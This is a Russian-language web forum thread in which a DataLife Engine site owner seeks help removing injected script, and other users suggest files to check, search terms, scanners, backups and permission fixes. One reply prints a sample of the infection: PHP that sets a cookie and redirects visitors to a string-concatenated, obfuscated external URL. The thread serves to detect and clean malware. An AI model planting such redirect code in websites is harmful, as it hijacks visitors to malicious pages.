[Помогите] Вирус на DLE сайте

Тема в разделе "DataLife Engine", создана пользователем hicenko, 4 июн 2013.

  1. hicenko

    hicenko

    Регистрация:
    24 янв 2013
    Сообщения:
    97
    Симпатии:
    17
    Пару дней назад яндекс ругнулся, что у меня вирус. Но я его сразу не увидел, а потом случайно на рабочем компе зашел и увидел немного покривленный диз и решил глянуть что там. И как оказалось ссылка такого плана <script src=***
    Я уже все перешерстил и не могу найти. Может кто сталкивался с таким. Подскажите где копать!?
    И еще, ссылки с некоторой переодичностью меняются.
     
  2. maFFyoZZyk

    maFFyoZZyk DLE & IPB

    Регистрация:
    20 июн 2012
    Сообщения:
    202
    Симпатии:
    37
    Вспоминайте что последнее ставили на сайт
     
  3. hicenko

    hicenko

    Регистрация:
    24 янв 2013
    Сообщения:
    97
    Симпатии:
    17
    uppod player, но после него несколько месяцев все было ок.
     
  4. answer

    answer

    Регистрация:
    4 апр 2013
    Сообщения:
    25
    Симпатии:
    5
    посмотрите файл engine/data/config.php или engine/data/dbconfig.php
    так же может быть в engine/print.php
    engine/go.php
    engine/init.php
    ещё лучше проверить все файлы в папке engine/
    кроме папок внутри нее....
    выглядит примерно так
    @setcookie('m_', '1', time()+86400, '/');
    @header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0");
    die();

    }
     
  5. hicenko

    hicenko

    Регистрация:
    24 янв 2013
    Сообщения:
    97
    Симпатии:
    17
    Проверил, тут все чисто...
    У меня было, что еще в языках сидело, но сейчас там тоже чисто :(
     
  6. answer

    answer

    Регистрация:
    4 апр 2013
    Сообщения:
    25
    Симпатии:
    5
    дайте посмотреть ссылку <script src=***
    то есть весь скрипт...
     
  7. hicenko

    hicenko

    Регистрация:
    24 янв 2013
    Сообщения:
    97
    Симпатии:
    17
     
  8. answer

    answer

    Регистрация:
    4 апр 2013
    Сообщения:
    25
    Симпатии:
    5
    На сегодняшний день код безвредный...совет: пересмотрите весь шаблон с админ панели, все подозрительные <script src=, удаляйте смело, далее переименуйте админку, закройте права на запись, и файлы заливайте только через FTP...

    К стати по поводу этого: посмотрите файл engine/data/config.php или engine/data/dbconfig.php
    так же может быть в engine/print.php
    engine/go.php
    engine/init.php
    ещё лучше проверить все файлы в папке engine/
    кроме папок внутри нее....
    выглядит примерно так

    посмотрите внимательно во всех файлах тег "android" внутри запросных строк, так же теги "ipad" "iphone" и другие копирующие названия популярных гаджетов, используются создателем вредоносной программы для определения на каких устройствах должен работать вирус, так как воспроизведение рекламы на гаджетах стоит дороже чем на ПК, а владельцы сайтов чаще заходят на свои сайты с ПК , в итоге вирус может долго оставаться не замеченным.Если найдете, скопируйте и оправьте мне, я вам покажу как правильно вырезать...
    найти тег "android" можно просто, копируете всё текстом в "нотепад" или "блокнот", далее в меню выбираете "найти далее", вводите "android" без кавычек, и если текст есть, редактор его обязательно найдет, если найдет, то всё что вокруг него на несколько строк вверх и вниз и есть вирус прокрутки рекламы для гаджетов...
    в данном случае дыркой является возможность загрузки аватара на сайт, то есть ава загружается с вредоносным кодом, который в дальнейшем является своего рода мостом между злоумышленником и скриптом вашего сайта...
     
    Electro нравится это.
  9. Майкл

    Майкл

    Регистрация:
    7 мар 2013
    Сообщения:
    60
    Симпатии:
    4
    я сталкивался. Решил проблему следующим образом: обратился в службу хостинга и откатил сайт до самого первого сохраненного у них бэкапа. А так сам долго лазил на своём сайте и в разных местах удалял код

    вторым способом, но это было на джумле, я просто скачал архив сайта и проверил антивирусом, а потом вручную удалял зараженные файлы с хостинга
     
  10. hicenko

    hicenko

    Регистрация:
    24 янв 2013
    Сообщения:
    97
    Симпатии:
    17
    Я уже слил весь сайт и проверил на:
    eval
    base64
    android
    header
    location
    и подозрительного не нашел ничего...:cry:

    Писал хостингу, он проверил на вирусы и сказал, что все в порядке и от соседей тоже не мог влезть.
    Какие еще могут быть варианты??? У меня уже мозг плавится...
    --- добавлено: 5 июн 2013 в 11:39 ---
    УРА!!!!
    /site/engine/modules/calendar.php
    Было вот это:

    Без слешов
     
  11. xxx

    xxx

    Регистрация:
    2 ноя 2012
    Сообщения:
    4
    Симпатии:
    2
    Попробуй проверить скриптом AI-Bolit, мне помогло.
     
  12. sekretenko

    sekretenko

    Регистрация:
    3 окт 2013
    Сообщения:
    38
    Симпатии:
    2
    Поменяй пароли и переименуй админку. А иногда бывает гораздо проще: ваш сайт ссылается на вирусный сайт и яндекс тоже считает, что ваш сайт заражен
     
  13. testtest

    testtest

    Регистрация:
    17 окт 2013
    Сообщения:
    2
    Симпатии:
    0
    еще .htacces все пересмотреть не помешат, часто в них прописывают открывать картинки как скрипты
     
  14. aleksin74

    aleksin74

    Регистрация:
    4 ноя 2012
    Сообщения:
    143
    Симпатии:
    266
    самое главное выставить правильные права на папки и файлы, что бы исключить возможность запихнуть в них какой то код и левые файлы, ну и естественно проверять те моды и шаблоны, которые устанавливаете
     
  15. Eksin

    Eksin Динозавр :)

    Регистрация:
    20 авг 2013
    Сообщения:
    111
    Симпатии:
    26
    Да причем тут "что последнее ставили на сайт , могли не через него залить , а через его соседей , а там могли и порутать сервак или просто хватило прав на его домен залиться и всё... пускай пишет в тех поддержку, а те в свою очередь "[email protected]" пускай уже подымают логи и смотрят...